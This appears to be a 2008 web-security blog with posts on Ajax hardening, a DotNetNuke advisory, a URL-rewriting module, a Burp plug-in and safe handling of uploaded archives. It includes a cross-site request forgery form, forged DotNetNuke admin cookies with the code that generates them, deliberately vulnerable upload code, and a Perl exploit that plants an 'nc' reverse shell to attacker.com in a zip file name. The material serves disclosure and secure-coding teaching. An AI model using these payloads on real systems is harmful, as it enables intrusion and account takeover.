Thursday, Apr 24, 2008

Web 2.0 and "Defense in Depth"

I was recently asked by a client for some technical countermeasures to consider as they prepare to build an Ajax-enabled web application (aside from more fundamental countermeasures like rigorous output encoding and request tokenization, which defend against XSS and XSRF respectively). What follows are a few suggestions I provided for implementing "defense in depth" within their Ajax-enabled (Web 2.0) application.

  • Specify the Appropriate Content-Type Response Header

By default, most HTTP responses generated by a web component include a "Content-Type" header value of "text/html" or "text/plain". The browser treats these responses as HTML and loads them into the DOM (some browsers will even content-sniff "text/plain" responses as HTML).

When rendering responses for Ajax requests, non-HTML content (like XML or JSON) is typically returned, so it is important to specify the correct "Content-Type" HTTP response header. For example, XML messages returned by Ajax calls should have a "Content-Type: text/xml" header. These responses will not be loaded into the browser DOM (based on their content-type), which can potentially thwart XSS attacks in the absence of other controls like proper output encoding.
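For illustration, here is a minimal servlet sketch (in Java, with a hypothetical endpoint and payload) that explicitly declares its Ajax response as XML:

import java.io.IOException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Hypothetical Ajax endpoint returning an XML message
public class AccountStatusServlet extends HttpServlet {
    @Override
    protected void doPost(HttpServletRequest request, HttpServletResponse response)
            throws IOException {
        // Declaring the payload as XML keeps the browser from parsing
        // the response as HTML and loading it into the DOM
        response.setContentType("text/xml");
        response.getWriter().write("<status>ok</status>");
    }
}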

  • Require POST Method for Ajax Calls Returning User Data

Any data returned by an Ajax GET request is potentially susceptible to JavaScript Hijacking if there are no controls specifically designed to thwart the attack (such as an XSRF token).

JavaScript Hijacking attacks rely on use of the <SCRIPT> tag "SRC" attribute, which is unable to make POST requests. As such, accepting only POST requests for Ajax calls that return user (or otherwise sensitive) data is generally a good idea.
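Continuing the hypothetical servlet sketch from the previous bullet, enforcing this can be as simple as refusing the GET method for the endpoint:

// A <SCRIPT SRC="..."> include can only issue GET requests, so
// rejecting GET outright removes that vector for this endpoint
@Override
protected void doGet(HttpServletRequest request, HttpServletResponse response)
        throws IOException {
    response.sendError(HttpServletResponse.SC_METHOD_NOT_ALLOWED);
}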

  • Check Content-Type on POST Requests

The browser "same origin" security policy is a key mechanism used to thwart malicious use of the XMLHttpRequest (XHR) object at the browser level. Standard HTML forms are not restricted by the same origin policy, so verifying that Ajax requests are made using the XHR object and not an HTML form can potentially buy some added safety.

Consider the following HTML form, which can be used to forge a JSON post (a similar technique can be used to forge XML requests):

<FORM ACTION="/ajax/dispatcher" METHOD="POST" ENCTYPE="text/plain">
<INPUT TYPE="hidden" NAME='{"action": "sendEmail", "recipient": "[email protected]", "messageText": "Hi George! ' VALUE=')"}'>
</FORM>

The request body produced by the above form POST is shown below. As you can see, to the server this looks like a valid JSON request (which is typically assumed to have been made using the XHR object).

{"action": "sendEmail", "recipient": "[email protected]", "messageText": "Hi George! =)"}

By default, POST requests made using the XHR browser object to send an XML document will have a Content-Type header of "application/xml" (and the application can set its own value explicitly via setRequestHeader). A standard HTML form submission, by contrast, is limited to a Content-Type of "application/x-www-form-urlencoded", "multipart/form-data", or "text/plain", so checking this value (server-side) can be one way to help ensure the request was not issued via a rogue 3rd party HTML form.
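A sketch of that check as a Java servlet filter (illustrative only; it assumes the application's own XHR calls send "Content-Type: text/xml" as described above):

import java.io.IOException;
import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Rejects POSTs whose Content-Type matches an HTML form enctype
// rather than the value set by the application's own XHR calls
public class AjaxContentTypeFilter implements Filter {
    public void init(FilterConfig config) {}
    public void destroy() {}

    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) res;
        String contentType = request.getContentType();
        if ("POST".equals(request.getMethod())
                && (contentType == null || !contentType.startsWith("text/xml"))) {
            response.sendError(HttpServletResponse.SC_BAD_REQUEST);
            return;
        }
        chain.doFilter(req, res);
    }
}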

  • Host 3rd Party Content in a Separate IFrame

When serving up 3rd party content, the developer should anticipate the possibility of embedded malicious script code.

Consider a typical RSS feed. The importance of HTML encoding RSS data elements when they are rendered in the page is generally well understood; however, certain elements (such as the <link> element) pose additional challenges.

Normally the <link> RSS element is rendered within the "href" attribute value of an HTML "A" tag. Depending on how the data is encoded, XSS is often still possible, since an exploit string such as "javascript:alert('XSS')" will be unaffected by most native HTML encoding mechanisms (like the built-in Server.HtmlEncode method in ASP.NET).

In addition to stringent encoding techniques, a good secondary defense-in-depth measure against these attacks is to render all 3rd party content (e.g., RSS, JavaScript widgets, etc.) in a separate IFrame, ideally served from a separate domain (for example, a dedicated widgets subdomain rather than the main application host). Serving untrusted content within a separate IFrame will not prevent a malicious script from executing, but when the IFrame is hosted on its own domain the browser's same origin policy prevents the malicious script from accessing application data via the DOM, since the IFrame has its own DOM context.

This is by no means intended to be a complete list of defensive Web 2.0 suggestions, so feel free to comment with additional thoughts.

Friday, Mar 21, 2008

DotNetNuke Default Machine Key Advisory

This morning we released an advisory to bugtraq regarding an exposure in DotNetNuke that can be used to trivially forge authentication tokens and impersonate arbitrary users (including the built-in admin account). The vendor was notified on March 3, 2008 and has now corrected the issue with the release of DotNetNuke version 4.8.2, so we have made the advisory public. This issue affects DotNetNuke versions 4.8.1 and below. Additional information can be found in the official DotNetNuke Security Bulletin.

Overview

DotNetNuke (DNN) is an open-source Web Application Framework used to create and deploy websites. The default web.config files distributed with DNN include an embedded Machine Key value (both ValidationKey and DecryptionKey). Under certain circumstances these values may not be updated during the installation/upgrade process, resulting in the ability for an attacker to forge arbitrary ASP.NET forms authentication tickets that can then be used to circumvent all security within a DNN installation. This issue was confirmed to affect the production instance of DNN used on the DNN Homepage (www.dotnetnuke.com).

Technical Details

The default web.config files distributed with DotNetNuke (DNN) include the following embedded ValidationKey and DecryptionKey values:

<machineKey
validationKey="F9D1A2D3E1D3E2F7B3D9F90FF3965ABDAC304902"
decryptionKey="F9D1A2D3E1D3E2F7B3D9F90FF3965ABDAC304902F8D923AC"
decryption="3DES"
validation="SHA1"/>

Normally, these values are overwritten by the web-based installation wizard during the initial website setup process; specifically, the Config.UpdateMachineKey() routine is called during installation. In scenarios where the web server user account does not have permission to update the web.config file during installation, the default values are not updated, resulting in a DNN installation that uses them for authentication token encryption and validation. It is unclear how widespread this issue may be; however, it was confirmed that the production instance of DNN used on the DNN Homepage (www.dotnetnuke.com) was affected.

Proof-of-Concept Exploit

This vulnerability is trivially exploited against any DNN installation using the default ValidationKey and DecryptionKey values. In order to exploit this issue, two forged cookies (named ".DOTNETNUKE" and "portalroles") must be generated. The ".DOTNETNUKE" cookie is used by the ASP.NET Forms Authentication Provider to identify the authenticated user, while the "portalroles" cookie is used by DNN to store role memberships for the current authenticated user.

The following C# code excerpt, when run from an ASP.NET web form configured to use the default ValidationKey and DecryptionKey values, generates the two FormsAuthenticationTicket values required to exploit this issue:

// Step 1: Generate the two FormsAuthenticationTickets

FormsAuthenticationTicket ticket1 = new FormsAuthenticationTicket("admin", true, 10000);
FormsAuthenticationTicket ticket2 = new FormsAuthenticationTicket(2, "admin", System.DateTime.Now, System.DateTime.MaxValue, true, "Registered Users;Subscribers;Administrators");

// Step 2: Encrypt the FormsAuthenticationTickets

string cookie1 = ".DOTNETNUKE=" + FormsAuthentication.Encrypt(ticket1);
string cookie2 = "portalroles=" + FormsAuthentication.Encrypt(ticket2);

The two cookie strings produced by the above code, as shown in the request below, can be used to obtain administrator level access to DNN installations affected by this issue.

NOTE: The exact cookie values shown below can be used as-is to test any installation still configured with the default keys.

GET /default.aspx HTTP/1.1
Host: www.dotnetnuke.com
Cookie: portalroles=CB14B7E2553D9F6259ECF746F2D77FD15B05C5A10D98225339D6E282EFEFB3DA90D0747CEE5FAF2E7605B598311BA3349D25C108FBCEC7A0141BE6CDA83F2896342FBA33FFD8CB18D9A8896F30182B9EEB47786AB9574F6F3EBD9ECF56C389B401BCF744224A869F4C23D5E4280ACC8E16A2113C0770317F3A741630C77BB073871BE3E1E8A6F67AC5F0AC0582925D690B1D777C0302E18E;.DOTNETNUKE=6BBF011195DE71050782BD8E4A9B906F770FEDF87AE1FC32D31B27A14E2307BF986E438E06F4B28DD30706CB516290D5CE1513DD677E64A098F912E2F63E3BE3DDE63809B616F614

Recommendation

DotNetNuke v4.8.2 has been released by DotNetNuke Corporation, which specifically addresses this issue. Additionally, check your web.config file to ensure that the validationKey value is not set to "F9D1A2D3E1D3E2F7B3D9F90FF3965ABDAC304902".
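For installations that cannot be upgraded immediately, replacing both keys with fresh random values also closes the hole; any cryptographically random hex strings of the appropriate lengths will do. A quick illustrative generator (written in Java purely for convenience; the lengths match the SHA1 validationKey and 3DES decryptionKey shown above):

import java.security.SecureRandom;

// Prints random key material suitable for a machineKey entry:
// 20 bytes (40 hex chars) for the SHA1 validationKey and
// 24 bytes (48 hex chars) for the 3DES decryptionKey
public class MachineKeyGen {
    public static void main(String[] args) {
        System.out.println("validationKey=\"" + randomHex(20) + "\"");
        System.out.println("decryptionKey=\"" + randomHex(24) + "\"");
    }

    private static String randomHex(int numBytes) {
        byte[] buf = new byte[numBytes];
        new SecureRandom().nextBytes(buf);
        StringBuilder sb = new StringBuilder();
        for (byte b : buf) {
            sb.append(String.format("%02X", b & 0xFF));
        }
        return sb.toString();
    }
}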

Wednesday, Feb 27, 2008

Bi-Directional HTTP Transformation

The ability to transform and inspect HTTP data as it flows in and out of a web application has many practical uses (both inside and outside of security). On IIS, this capability was historically restricted to ISAPI filters. Http Modules written in ASP.NET have always allowed processing of requests and responses to and from an ASP.NET application, and with the advent of IIS7 and its integrated ASP.NET pipeline, they now have access to virtually all stages of request processing (including requests not handled by ASP.NET).

Transformer.NET is an Http Module designed for on-the-fly inbound and outbound url rewriting. Apache's mod_rewrite, used to manipulate inbound request urls, is arguably one of the most popular Apache modules around. While there have been several ports of mod_rewrite to IIS (with implementations ranging from Http Modules to ISAPIs), they all share one shortcoming with their Apache predecessor: they only rewrite requests, not the urls within outbound responses (such as links generated within an HTML page).

This has long been a pet peeve of mine. If you want to use mod_rewrite, you typically need to update the underlying website source code so that the hyperlinks within the application point to the "rewritten" urls. This can be a major effort and inconvenience if the site is already written, and even worse, it may not be possible for 3rd party or COTS web applications.

The initial beta release of Transformer.NET differs from previous rewrite modules because it supports bi-directional (inbound and outbound) url rewriting. Bi-directional rewriting eliminates the need to modify the underlying website code, which is great for legacy or third party web sites and applications. In addition to the ability to parse response content (such as HTML), Transformer.NET also includes the following two key internal mechanisms:

 

Normalization Engine

Normalizing all urls into their absolute representation quickly became essential for two reasons. First, the module needs to be able to apply configured rules to a given url in any form, so a rule for "/foo/bar.htm" might need to be applied to "bar.htm", "../bar.htm", or any number of other relative variants depending on the path of the rendering page. Second, if "/foo/bar.htm" is rewritten to "/fake/bar.htm", then suddenly all of the relative links on the page (images, css, etc) will be broken. Replacing each relative link on a rewritten page with its absolute counterpart is essential.
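As a conceptual sketch (not the module's actual code), the normalization boils down to resolving each url against the path of the page that renders it:

import java.net.URI;

// Conceptual sketch of url normalization: resolve a url in any form
// against the rendering page, yielding the absolute path that rewrite
// rules are matched against.
public class UrlNormalizer {
    public static String toAbsolutePath(String pagePath, String url) {
        // example.com is a placeholder; only the resulting path is used
        return URI.create("http://example.com" + pagePath).resolve(url).getPath();
    }

    public static void main(String[] args) {
        System.out.println(toAbsolutePath("/foo/page.htm", "bar.htm"));    // /foo/bar.htm
        System.out.println(toAbsolutePath("/foo/page.htm", "../bar.htm")); // /bar.htm
    }
}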

Internal Url Cache

As with anything in the software world, performance is important. Inspecting and transforming very large responses when many rules have been defined can be a real performance killer. To help minimize the impact, Transformer.NET maintains an internal cache of all rewrites that are performed, eliminating unneeded processing the next time the url is rendered on a page. The net result is that as more requests are parsed by the module, the performance impact continually decreases. To avoid stale entries, the cache is cleared any time a rewrite rule changes.
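The cache itself can be as simple as a thread-safe map from original url to rewritten url. A rough sketch of the idea (the rule engine is elided):

import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.ConcurrentMap;

// Caches each rewrite so repeated renderings of the same url
// skip rule evaluation entirely
public class RewriteCache {
    private final ConcurrentMap<String, String> cache =
            new ConcurrentHashMap<String, String>();

    public String rewrite(String url) {
        String cached = cache.get(url);
        if (cached != null) return cached;
        String rewritten = applyRules(url); // the expensive part
        cache.put(url, rewritten);
        return rewritten;
    }

    // Cleared whenever a rewrite rule changes, to avoid stale entries
    public void clear() { cache.clear(); }

    private String applyRules(String url) { /* rule evaluation elided */ return url; }
}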

The bi-directional rewriting capability of Transformer.NET was really an initial "proof-of-concept" for us to start building bi-directional HTTP inspection and transformation solutions to solve some very interesting web application security problems.

Unlike Apache's mod_rewrite, Transformer.NET does not implement conditional rewrites (à la mod_rewrite's RewriteCond), so it is not intended to be a complete port. The current beta version can be downloaded from our tools page. Transformer.NET works on IIS6 (limited to ASP.NET applications) and with any site running on IIS7. A detailed user guide is included with the download.

Tuesday, Feb 19, 2008

A "Deflate" Burp Plug-In

I wrote a plug-in for Burp Proxy that decompresses HTTP response content in the ZLIB (RFC1950) and DEFLATE (RFC1951) compression data formats. This arose out of an immediate need on a recent web application security assessment.

Inspecting the HTTP traffic between the client and server of the application under review, it appeared that most of the response bodies were compressed but unfortunately not being decoded by Burp (despite the "unpack gzip" option being enabled). The client, a Java applet, relied on response data for a lot of interesting functionality (including access control), so the ability to easily view and manipulate the contents in plaintext before they reached the applet was clearly beneficial (let's ignore the obvious client-side security issue here; that's a topic for another discussion).

As I mentioned earlier, it appeared the response content was compressed; however, the expected Content-Encoding HTTP response header was not present. Inspection of the decompiled Java applet code confirmed that compression was being performed with the java.util.zip.Deflater and java.util.zip.Inflater classes. At present, Burp Proxy does not support the ZLIB and DEFLATE compression formats (only GZIP compression is supported).
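The decompression step itself is straightforward with those same classes. Here is a minimal sketch (not the plug-in's actual source) that handles both formats, since the Inflater "nowrap" constructor flag toggles between ZLIB (RFC1950) and raw DEFLATE (RFC1951):

import java.io.ByteArrayOutputStream;
import java.util.zip.DataFormatException;
import java.util.zip.Inflater;

// Inflates a compressed response body; pass rawDeflate=true for
// RFC1951 data, false for RFC1950 (2-byte ZLIB header + Adler-32)
public static byte[] inflate(byte[] body, boolean rawDeflate)
        throws DataFormatException {
    Inflater inflater = new Inflater(rawDeflate); // "nowrap" flag
    inflater.setInput(body);
    ByteArrayOutputStream out = new ByteArrayOutputStream();
    byte[] buf = new byte[4096];
    while (!inflater.finished()) {
        int n = inflater.inflate(buf);
        if (n == 0 && inflater.needsInput()) break; // truncated input
        out.write(buf, 0, n);
    }
    inflater.end();
    return out.toByteArray();
}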

Burp is an essential tool in any web app testing toolkit and extending its functionality to inflate "deflate" compressed response content via the handy IBurpExtender interface seemed a worthwhile contribution. I hope others find the plug-in useful as well; at a minimum, it will be useful when the application returns for a round of regression testing.

The Burp plug-in can be downloaded here.

Also included with the download is an example servlet called "DeflateTestServlet" for generating HTTP response bodies in the RFC1950 and RFC1951 compressed formats for testing the plug-in.

Also, here's a good link that may help clarify your understanding of the compression formats used with HTTP.

Monday, Jan 21, 2008

Handling Uploaded Archives Securely

Insecure handling of file uploads is one of my favorite issues to test for during web application security assessments. Upload flaws often provide exploitable attack vectors for compromising the server, the application, and/or the end user. In this post, I focus on insecure handling of uploaded archive files, something I've seen repeatedly. In my experience, most of the applications vulnerable to this flaw do a fairly good job vetting the uploaded file itself, but fail to apply the same scrutiny to the files packaged inside it. Consider the following PHP code snippet:

Example 1:

<?php
if (isFileValidArchive())
{
    $files = getSortedListOfFilesFromValidatedArchive();

    foreach ($files as $filename)
    {
        $ext = substr($filename, strrpos($filename, '.') + 1);
        // only handle .doc files
        if ($ext == "doc")
        {
            $cmd = "/usr/bin/unzip -j -o " . $_FILES['userfile']['tmp_name']
                 . " \"" . $filename . "\" -d /tmp/uploads";
            exec($cmd, $results, $status);
            // process results
        }
    }
}
?>

The $filename variable holds the name of a packaged file (such as "somefile.doc") retrieved from an uploaded archive. As usual, blind trust of user-supplied input (here, the name of a file packaged within a user-uploaded .zip file) creates an exploitable attack vector, in this case arbitrary command execution. Given that the attacker's operating system is likely to prevent certain special characters within a file name, how is this exploitable?

For example, the characters < > : " / \ | ? * are typically forbidden by MS Windows operating systems. These same characters are often useful for manipulating command strings.

To answer the question above, zip compression libraries do the job because they can create and package archives entirely in memory, unconstrained by OS file system naming rules. Allowing special characters in a file name is likely not an oversight, as it appears consistent with the .ZIP File Format Specification. It's also worth noting that the spec permits the use of alternate character encodings, which could be leveraged by an attacker to bypass potential blacklist filtering mechanisms. The following Perl script uses the Chilkat zip library to exploit the command injection flaw in Example 1.

use chilkat;

# Create a .zip archive in-memory
$zip = new chilkat::CkZip();
$zip->UnlockComponent("anything for 30-day trial");
$zip->NewZip("MaliciousArchive.zip");

# Package a file with a malicious file name
$zip->AppendString("foo\" & nc -c /bin/sh attacker.com 8888 & \"bar.doc","junk");
$zip->WriteZipAndClose();

From a security code review perspective, the use of the PHP exec() function in Example 1 should be an immediate red flag (whether you are a security auditor or a developer). In general, shelling out to perform OS commands is never a good idea, especially if the command potentially contains user input.

A safer alternative when building applications is to use native or 3rd party zip compression APIs, such as the PHP Zip File Extensions or the Java package java.util.zip. Even when these are used, however, developers still find ways to do it insecurely. Consider Example 2, a code snippet from a J2EE web application:

Example 2:

ZipFile zipFile = new ZipFile(uploadedZipFile);

try
{
    Enumeration<? extends ZipEntry> zipEntries = zipFile.entries();
    while (zipEntries.hasMoreElements())
    {
        ZipEntry zipEntry = zipEntries.nextElement();
        File packagedFile = new File("/tmp/uploads", zipEntry.getName());
        // Create "packagedFile" on the file system and
        // copy the contents of "zipEntry" into it
    }
}
finally
{
    zipFile.close();
}

Again, the attacker controls everything within the zip file. By embedding sequences such as "../" in the name of a packaged file, an attacker can traverse out of "/tmp/uploads" and force the application to write the file to an arbitrary location, such as the web root directory. A simple "cmd.jsp" file would then allow the attacker to execute arbitrary commands on the web server.

How can developers harden their applications against similar mistakes? First, ensure the application applies appropriate server-side controls when handling file uploads, such as:

  • maximum file size enforcement
  • file type and format restrictions
  • random filename assignment
  • virus scanning
  • storing the file into a non-web accessible directory
  • etc, etc, etc

If archive files are permitted, ensure the same level of stringent validation is also applied to packaged files and, most importantly, never trust user-supplied data elements (such as file names or other file attributes) when determining where and how a file will be stored on the file system.
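As a concrete illustration of that last point, the traversal in Example 2 can be blocked by canonicalizing the destination path before any bytes are written to disk (a sketch; the helper name is mine):

import java.io.File;
import java.io.IOException;

// Resolves an archive entry name against the upload directory and
// rejects any entry whose canonical path escapes that directory
public static File safeDestination(File uploadDir, String entryName)
        throws IOException {
    File dest = new File(uploadDir, entryName);
    String dirPath = uploadDir.getCanonicalPath() + File.separator;
    if (!dest.getCanonicalPath().startsWith(dirPath)) {
        throw new IOException("Archive entry escapes upload directory: " + entryName);
    }
    return dest;
}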